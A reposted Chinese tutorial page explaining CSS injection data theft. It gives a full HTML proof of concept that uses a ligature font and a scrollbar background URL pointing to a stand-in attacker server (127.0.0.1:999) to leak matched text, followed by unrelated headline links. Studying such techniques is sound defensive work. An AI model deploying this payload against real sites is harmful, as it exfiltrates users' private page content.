<!doctype html><html><head><meta charset="UTF-8"><title>Untitled Document</title><style>@font-face {font-family: "hack";src: url(data:application/x-font-woff;base64,d09GRk9UVE8AAASQAA0AAAAABrAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABDRkYgAAADCAAAAMUAAAESIYipMEZGVE0AAAR0AAAAGQAAAByNNn8cR0RFRgAAA9AAAAAhAAAAJABOADlHUE9TAAAEQAAAACAAAAAgbJF0j0dTVUIAAAP0AAAASQAAAFrZZNxYT1MvMgAAAYQAAABEAAAAYFXjXMBjbWFwAAACpAAAAFgAAAFKYztWsWhlYWQAAAEwAAAAKgAAADYS6ZoHaGhlYQAAAVwAAAAgAAAAJAN85DxobXR4AAAEYAAAABEAAABw5OcAAG1heHAAAAF8AAAABgAAAAYAHFAAbmFtZQAAAcgAAADaAAABYiFRA6twb3N0AAAC/AAAAAwAAAAgAAMAAHicY2BkYGAAYpOXdZLx/DZfGbiZXwBFGG4+XTMRmYYCDgYmEAUAQpwKTAAAeJxjYGRgYFb4b8EQxfyCgeHBfwYGBqAICpABAHGNBJ0AAFAAABwAAHicY2Bm/MI4gYGVgYOpi2kPAwNDD4RmfMBgyMjEwMDEwMrMAAOMDEggIM01hcGBIZGhilnhvwVDFIYaBSBkBwBaygpNeJxdkDtOAzEQhr9NNuEp6NLijmpX9ioNqahyAIr0q8jaRES7kpNcghohcQwOQM21+B2GJh7Z883on4cM3PJBQT4FJdfGIy54MB7j2BqXsnfjCTd8GU+V/5GyKK+UuTxVZR5xx73xmGcejUtp3ownzPg0nir/zYaWNa+wadd6X4h0HNkpnRTG7rhrBUsGeg4nn6SIWrShxssvdP/b/EVzKoKsksbLP6nB0B+WQ+qia2rvFi6Pk5tXIVSND1KcbbLSjMRe35EnO3XJ01jFtN8OvQu1Py/5BWsjLgEAAHicY2BgYGaAYBkGRgYQcAHyGMF8FgYNIM0GpBkZmICsqv//wSoSQfT/BVD1QMDIxoDg0AowMjGzsLKxc3BycfPw8vELCAoJi4iKiUtIStHaZqIAALdlCJ94nGNgZsALAAB9AAR4nGNkYGFhYGRkZM1ITM5mYGRiYGTQ+CHD9EOW+YcESzcPczcPSzcQsMowxPLLMDAIyDBMEZRhYJdh5BZiYAap5mMQYhArjk+Nz44vjS+KT4zPBpkENg0InBicGVwYXBncGNwZPBg8GbwYvBl8GHwZ/Bj8GQIYAhmCGIIZQhhCGcIYwhkiGCIZohiiGdsZZBgZWdi5eAWExSRl5JVUNbT1DE3MrWwdnN08ffyDIn7V8PWIURPJPPgPJLtFukW7ebgA4FE4WAAAAHicY2BkYGDgAWIZIGYCQkYGKSCWBkImBhawGAmacZ8AiAAAAHicLYk7CoAwFATnwROD6QxWiifwUqmCEKxy/7h+imWYWQyY2DmwmttFwFXoneexepasxmf6/GXQtp/OyshAZGGWR81IN43bBm8AAAAAAQAAAAoAHAAeAAFsYXRuAAgABAAAAAD//wAAAAAAAHicY37BQDfw4D8DAwBs1QLLAAAAeJxjYGBgZACCm9mqP8H00zUTYTQAVA0IWgAAAA==);}span {background: lightblue;font-family: "hack";}body {white-space: nowrap;}body{overflow-y: hidden;overflow-x: auto;}body::-webkit-scrollbar {background-color: blue;}body::-webkit-scrollbar:horizontal {background: url(http://127.0.0.1:999);}</style></head><body><span id=span>123sekurak123</span></body></html>我们设置iframe的width=900px,连字体设置非常大，当出现连字sekurak时就会出现滚动条，从而请求攻击者的服务器 。

文章插图
 
后面就是代码实现和思路的问题了，具体可以看zsx师傅写的https://xz.aliyun.com/t/6655#toc-5
 
原理 

文章插图
 
作者：smile

【通过CSS注入窃取HTML中的数据】

推荐阅读

• 

  北京世园会“陕西日”展示“魅力三秦”
• 

  每天喝很多水但还是嘴干口渴。是不是得了啥病啊
• 

  明星|人民大会堂不许化妆明星被打回原形，明星与普通人的差距究竟有多大？
• 

  三联读片灯？win10怎么改hosts文件？
• 

  王珞丹|王珞丹，最终为自己的无知付出了代价！
• 

  肺癌▲肺癌一查就是晚期？身体4个表现，是肺在报警，很多人都忽视了
• 

  祖孙|原创胡杏儿祖孙三代徒步旅行，儿子晒黑不少，一家三口同框幸福温馨
• 

  鱼肉：鱼肉有血丝
• 

  「爱情绅士」以下五种情况不允许离婚，关于《新婚姻法》规定：即便双方同意离
• 

  山药吃可以吃多少,女人经期是否能喝菊花茶
• 

  移植第一天胚胎在干嘛
• 

  欧阳娜娜|欧阳娜娜真的长大了，后空+深V白纱裙惊艳，加盟索尼成邓紫棋师妹
• 

  马甲线联盟|一人力量练臀，两者之间身材有什么区别？，一人有氧减脂
• 

  『vivo』Vivo iQOO Z1与iQOO neo3相差500元，有哪些差距？
• 

  金额3.73亿元！大禹节水：郏县广阔渠和恒压灌区提质增效（一期）项目预中标
• 

  吴晓波频道程维成为程维
• 

  利玛窦|原创71岁刘松仁近照暴瘦，右手常年插口袋出行靠拐杖，年初曾被曝中风
• 

  好六网|DNF： 谋略战怪物强度星数，战斗蟹仅二星，五星怪只有4个
• 

  2020年什么时候开始数九？
• 

  新青年必读|剑指麦加：历史上两次对圣城的未遂远征

• 八马茶业乌龙茶GAP示范基地通过验收
• 淘宝开店人脸认证不通过怎么办 淘宝开店阿里实人认证不通过
• 做梦梦见考试没通过 女人梦见考试没通过
• 安溪茶检中心通过食品检验机构资质认定初评
• 霞浦县,三茶树种质资源保护项目通过验收
• CSS浏览器兼容性，最完整处理方案
• 如何通过局域网方式接入Internet
• HTML + CSS 为何得不到编程界的认可？
• 梦见自己考试结果没通过 梦到自己考试没有通过是怎么回事
• 淘宝店铺怎么通过认证 淘宝开店认证已通过是不是已经开店成功了